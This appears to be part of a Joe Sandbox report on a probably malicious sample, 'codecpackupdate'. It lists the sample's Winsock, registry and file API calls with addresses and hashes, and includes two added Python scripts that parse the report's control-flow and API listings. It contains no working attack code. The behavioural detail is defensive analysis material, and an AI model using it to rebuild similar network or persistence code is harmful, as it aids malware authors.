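# Constructed sample: the control_flow_graph token stream of the WSARecv/select
# function at 009F2B95, copied from this report's text export.
SAMPLE = (
    "control_flow_graph 942 9f2b95-9f2baf 943 9f2bc7-9f2bcb 942->943 944 9f2bb1-9f2bb9 "
    "call a00a50 942->944 945 9f2bdf 943->945 946 9f2bcd-9f2bd0 943->946 951 9f2bbf-9f2bc2 "
    "944->951 949 9f2be2-9f2c11 WSASetLastError WSARecv call 9fa43c 945->949 946->945 "
    "948 9f2bd2-9f2bdd call a00a50 946->948 948->951 956 9f2c16-9f2c1d 949->956 954 9f2d30 "
    "951->954 957 9f2d32-9f2d38 954->957 958 9f2c1f-9f2c2a call a00a50 956->958 "
    "959 9f2c2c-9f2c32 956->959 970 9f2c3f-9f2c42 958->970 961 9f2c46-9f2c48 959->961 "
    "962 9f2c34-9f2c39 call a00a50 959->962 963 9f2c4f-9f2c60 call a00a50 961->963 "
    "964 9f2c4a-9f2c4d 961->964 962->970 963->957 968 9f2c66-9f2c69 963->968 964->968 "
    "972 9f2c6b-9f2c6d 968->972 973 9f2c73-9f2c76 968->973 970->961 972->973 "
    "974 9f2d22-9f2d2d call 9f1996 972->974 973->954 975 9f2c7c-9f2c9a call a00a50 "
    "call 9f166f 973->975 974->954 982 9f2cbc-9f2cfa WSASetLastError select call 9fa43c "
    "975->982 983 9f2c9c-9f2cba call a00a50 call 9f166f 975->983 989 9f2cfc-9f2d06 "
    "call a00a50 982->989 990 9f2d08 982->990 983->954 983->982 997 9f2d19-9f2d1d 989->997 "
    "993 9f2d0a-9f2d12 call a00a50 990->993 994 9f2d15-9f2d17 990->994 993->994 994->954 "
    "994->997 997->949"
)

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node: int
    start: int
    end: int
    labels: list = field(default_factory=list)  # API names and 'call <target>'


@dataclass
class Cfg:
    entry: Optional[int] = None
    blocks: dict = field(default_factory=dict)  # node id -> Block
    edges: list = field(default_factory=list)   # (src, dst) in dump order


def parse_cfg(dump: str) -> Cfg:
    """Token grammar (inferred from the dump, an assumption): '<id> <addr[-addr]>'
    opens a block, 'src->dst' is an edge, anything else labels the open block."""
    toks = dump.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, i = Cfg(), None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            cfg.edges.append((int(m[1]), int(m[2])))
            i += 1
        elif NODE_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = Block(int(t), int(lo, 16), int(hi or lo, 16))
            cfg.blocks[cur.node] = cur
            if cfg.entry is None:
                cfg.entry = cur.node
            i += 2
        else:
            if cur is None:
                raise ValueError(f"label {t!r} before any block")
            if t == "call" and i + 1 < len(toks):
                # consume the target together with the keyword so a digits-only
                # call target is never mistaken for a node id
                cur.labels.append(f"call {toks[i + 1]}")
                i += 2
            else:
                cur.labels.append(t)
                i += 1
    return cfg


def find_back_edges(cfg: Cfg) -> list:
    """DFS from the entry; an edge into a block still on the DFS stack is a
    loop back-edge and its target is the loop head."""
    succ = {}
    for s, d in cfg.edges:
        succ.setdefault(s, []).append(d)
    state, back = {}, []           # node -> 'open' (on stack) or 'done'

    def visit(n):
        state[n] = "open"
        for m in succ.get(n, []):
            if state.get(m) == "open":
                back.append((n, m))
            elif m not in state:
                visit(m)
        state[n] = "done"

    visit(cfg.entry)
    return back


def loop_heads(cfg: Cfg) -> list:
    """One line per loop head: its address range, its labels, and the block
    that jumps back to it."""
    out = []
    for src, head in find_back_edges(cfg):
        b = cfg.blocks[head]
        out.append(f"loop head {b.start:x}-{b.end:x} [{' '.join(b.labels)}] "
                   f"re-entered from {cfg.blocks[src].start:x}")
    return out


if __name__ == "__main__":
    for line in loop_heads(parse_cfg(SAMPLE)):
        print(line)
```

On this dump the only back-edge is 997->949, so the single loop head is the block that calls WSARecv; the edge 983->982 lies inside that loop's body rather than opening a second loop, which is why a plain edge list is not enough and the DFS colouring is needed.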
                                                                          Control-flow Graph (rendered image omitted): function 009F29EE-009F2AC6; entry block 9f29ee-9f2a06, close path 9f2a39-9f2a4c (WSASetLastError, closesocket), non-blocking close path 9f2a7b-9f2aad (ioctlsocket, WSASetLastError, closesocket), exit block 9f2abe-9f2ac6.
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2A3B
                                                                          • closesocket.WS2_32 ref: 009F2A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 009F2A89
                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 009F2A97
                                                                          • closesocket.WS2_32 ref: 009F2A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: bb4104a61ebb8f266a91d3dbea19cef88226777ecdc7dac15cb0eff6d5fe24af
                                                                          • Instruction ID: 472100aab4398ee66d5bb8d820b33896c3d3d4a18655c0e2c3ae93cf8813c2fb
                                                                          • Opcode Fuzzy Hash: bb4104a61ebb8f266a91d3dbea19cef88226777ecdc7dac15cb0eff6d5fe24af
                                                                          • Instruction Fuzzy Hash: 7021D3B1A00309ABDB20EBF89948BBE76FCAF44311F148569FA15C32D1EA74CD468751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered image omitted): function 009F1BA7-009F1C6E; entry block 9f1ba7-9f1bcf (RtlEnterCriticalSection), 9f1be9-9f1bf7 (RtlLeaveCriticalSection), 9f1bfa-9f1c20 (RtlEnterCriticalSection), exit block 9f1c55-9f1c6e (RtlLeaveCriticalSection).
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F1BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: 631e10ef4b574c148a691b8012db53d7877dad497fd25a765f37b73962238e1a
                                                                          • Instruction ID: 39b5e59477aa92a014f172dbc65c8c39e428941af4eb3036536de2b596acd233
                                                                          • Opcode Fuzzy Hash: 631e10ef4b574c148a691b8012db53d7877dad497fd25a765f37b73962238e1a
                                                                          • Instruction Fuzzy Hash: C321AB75A04219DFCB14CF68C8447AABBB8FF98310F118189E95597301D774ED01CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                          • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009F2EFD
                                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009F2F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009F2F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: 51e4c58dcd5e3bb2a1401454d71bb132e276c85d39f1414771666e7a59f39a6c
                                                                          • Instruction ID: 00757c2d8695c277468882762cb1e6074c32a18212ab9bfee66fa42583186575
                                                                          • Opcode Fuzzy Hash: 51e4c58dcd5e3bb2a1401454d71bb132e276c85d39f1414771666e7a59f39a6c
                                                                          • Instruction Fuzzy Hash: BB017571611208BBDB209FA5DC49FDA7BBDEB89761F008565FA18CB191D6748C018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

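The function summaries above list each call as `Name.Module(args), ref: address`, with `?` for arguments the sandbox could not resolve and every resolved argument printed as raw hex. The Python below is an added example, not part of this report or of the Joe Sandbox tooling; it parses those bullet lines into records and decodes the arguments that matter for reading this sample's socket and timer code: `ioctlsocket` with 8004667E is FIONBIO (non-blocking socket), `setsockopt` level 29h with option 1Bh is IPPROTO_IPV6/IPV6_V6ONLY, `WSASocketA` with dwFlags 1 is WSA_FLAG_OVERLAPPED, and the `SetWaitableTimer` period 000493E0 is 300000 ms, a five-minute periodic timer. The line grammar is inferred from the report text and is an assumption; the constant values are from the Windows SDK headers; the sample lines are copied from the listings above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API bullet lines in the shape the report prints them
# (copied from the function summaries of this report).
SAMPLE = """\
• WSASetLastError.WS2_32(00000000), ref: 009F2EEE
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009F2EFD
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009F2F36
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 009F2A89
• SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009F2778
  • Part of subcall function 009F2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009F2D5C
• GetTickCount.KERNEL32 ref: 00401FFB
"""

# Line grammar inferred from the report text (assumption): optional subcall
# prefix, Api.Module, optional (args), then "ref: <hex>".
LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<api>\w+)\.(?P<mod>\w+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)""",
    re.VERBOSE,
)

# Constants the report shows only as raw hex (values from the Windows SDK).
FIONBIO = 0x8004667E        # ioctlsocket command: non-blocking mode
IPPROTO_IPV6 = 0x29         # setsockopt level 41
IPV6_V6ONLY = 0x1B          # setsockopt option 27 (0 = dual-stack socket)
WSA_FLAG_OVERLAPPED = 0x01  # WSASocketA dwFlags


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                          # int per argument, None where the report printed '?'
    ref: int                            # address of the call site
    subcall_of: Optional[int] = None    # enclosing function for nested "Part of subcall" lines


def _parse_args(raw: Optional[str]) -> list:
    if raw is None or not raw.strip():
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]


def parse_api_lines(text: str) -> list:
    """Parse every API bullet line; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append(ApiCall(
            api=m["api"], module=m["mod"], args=_parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


def annotate(call: ApiCall) -> list:
    """Decode the arguments that say what the socket or timer code is doing."""
    a, notes = call.args, []
    if call.api == "ioctlsocket" and len(a) > 1 and a[1] == FIONBIO:
        notes.append("FIONBIO: socket switched to non-blocking mode")
    if call.api == "setsockopt" and len(a) > 2 and a[1] == IPPROTO_IPV6 and a[2] == IPV6_V6ONLY:
        notes.append("IPV6_V6ONLY on an IPv6 socket (optval pointer not resolved by the sandbox)")
    if call.api == "WSASocketA" and len(a) > 5 and a[5] is not None and a[5] & WSA_FLAG_OVERLAPPED:
        notes.append("WSA_FLAG_OVERLAPPED: socket created for overlapped I/O")
    if call.api == "SetWaitableTimer" and len(a) > 2 and a[2]:
        notes.append(f"periodic timer, lPeriod = {a[2]} ms ({a[2] / 1000:g} s)")
    return notes


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        where = f"{c.ref:08X}" + (f" (in {c.subcall_of:08X})" if c.subcall_of else "")
        print(f"{where}  {c.api}.{c.module}  {'; '.join(annotate(c)) or '-'}")
```

The optval pointer of `setsockopt` is printed as 00000000 because the sandbox did not dereference it, so the code reports the option being set but not its value; whether the socket is IPv6-only or dual-stack has to be read from the disassembly.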
                                                                          APIs
                                                                            • Part of subcall function 009F2D39: WSASetLastError.WS2_32(00000000), ref: 009F2D47
                                                                            • Part of subcall function 009F2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009F2D5C
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 009F2E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3'
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 3a222178ea703f5d52080c78c0d73cfb6eea68e61438407d48473288933b7e45
                                                                          • Instruction ID: e35dea037f1cf01f3a900e3e13ac2ba0f90b07a650dcebcdd36997c77c16cbda
                                                                          • Opcode Fuzzy Hash: 3a222178ea703f5d52080c78c0d73cfb6eea68e61438407d48473288933b7e45
                                                                          • Instruction Fuzzy Hash: E331CDB0E0030D9FDF10DFA0D806BFE7BB9AF48364F104559EA09D7281E7B499458BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2AEA
                                                                          • connect.WS2_32(?,?,?), ref: 009F2AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3'
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: 437ca5772bf10e842f1be8c55d5256fc7b00b2a7ddda7a359aeb1d7e4fb1c02c
                                                                          • Instruction ID: aa359dd62a2dac1b446022054179303a613d6cc10098bfd5f8fefcfa6de5be68
                                                                          • Opcode Fuzzy Hash: 437ca5772bf10e842f1be8c55d5256fc7b00b2a7ddda7a359aeb1d7e4fb1c02c
                                                                          • Instruction Fuzzy Hash: 8C21C670E0020CABCF14EFA4D505BFEBBB9EF85321F108159ED19D7281DB748A028B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 881c8be00c89de65423f84902410ad4697b8bb030b4a0026186a2cc2042ab3e9
                                                                          • Instruction ID: e710ecef1a6012b64c5a00c37f3681a358dfe1065cec6e3d42d4fcc13a1ce23b
                                                                          • Opcode Fuzzy Hash: 881c8be00c89de65423f84902410ad4697b8bb030b4a0026186a2cc2042ab3e9
                                                                          • Instruction Fuzzy Hash: 73513EB190421ADFCB04DF68D541BAABBB4FF48310F14C15DF9299B391D7749A11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 009F36A7
                                                                            • Part of subcall function 009F2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F2432
                                                                            • Part of subcall function 009F2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F2445
                                                                            • Part of subcall function 009F2420: RtlEnterCriticalSection.NTDLL(?), ref: 009F2454
                                                                            • Part of subcall function 009F2420: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2469
                                                                            • Part of subcall function 009F2420: RtlLeaveCriticalSection.NTDLL(?), ref: 009F2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: a2b40948ee6da0f992dc5619e0c2cc4e9c13aa7ef4d03587ba5ca90377afee23
                                                                          • Instruction ID: da9b57ca03fb6d0a5280fc55ca1875ac9a3fb6dd8eabcd1c540ee7d20859c55b
                                                                          • Opcode Fuzzy Hash: a2b40948ee6da0f992dc5619e0c2cc4e9c13aa7ef4d03587ba5ca90377afee23
                                                                          • Instruction Fuzzy Hash: 4B11C1B510420DABDF21AF54CC86FBA3B69EF44350F108516FF12CA2E0CB78DA619B94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 00A02046
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,009FA8BC,00000000), ref: 00A02077
                                                                          • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,009FA8BC,00000000), ref: 00A02085
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(00A2727C), ref: 009F1ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 009F1ACB
                                                                          • InterlockedExchange.KERNEL32(00A27280,00000000), ref: 009F1AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                          • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CommandLine$ArgvLocalTime
                                                                          • String ID:
                                                                          • API String ID: 3768950922-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4BF2
                                                                            • Part of subcall function 009F1BA7: __EH_prolog.LIBCMT ref: 009F1BAC
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                            • Part of subcall function 009FE02B: __EH_prolog.LIBCMT ref: 009FE030
                                                                            • Part of subcall function 009FE02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FE0AF
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 009F4CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2D47
                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009F2D5C
                                                                            • Part of subcall function 009FA43C: WSAGetLastError.WS2_32(00000000,?,?,009F2A51), ref: 009FA44A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F833A
                                                                          • shutdown.WS2_32(?,00000002), ref: 009F8343
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040BB89
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID:
                                                                          • API String ID: 3132538880-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F511E
                                                                            • Part of subcall function 009F3D7E: htons.WS2_32(?), ref: 009F3DA2
                                                                            • Part of subcall function 009F3D7E: htonl.WS2_32(00000000), ref: 009F3DB9
                                                                            • Part of subcall function 009F3D7E: htonl.WS2_32(00000000), ref: 009F3DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE8F9
                                                                            • Part of subcall function 009F1A01: TlsGetValue.KERNEL32 ref: 009F1A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009F33CC
                                                                            • Part of subcall function 009F32AB: __EH_prolog.LIBCMT ref: 009F32B0
                                                                            • Part of subcall function 009F32AB: RtlEnterCriticalSection.NTDLL(?), ref: 009F32C3
                                                                            • Part of subcall function 009F32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 009F32EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(4660960D), ref: 00A8E376
                                                                          Memory Dump Source
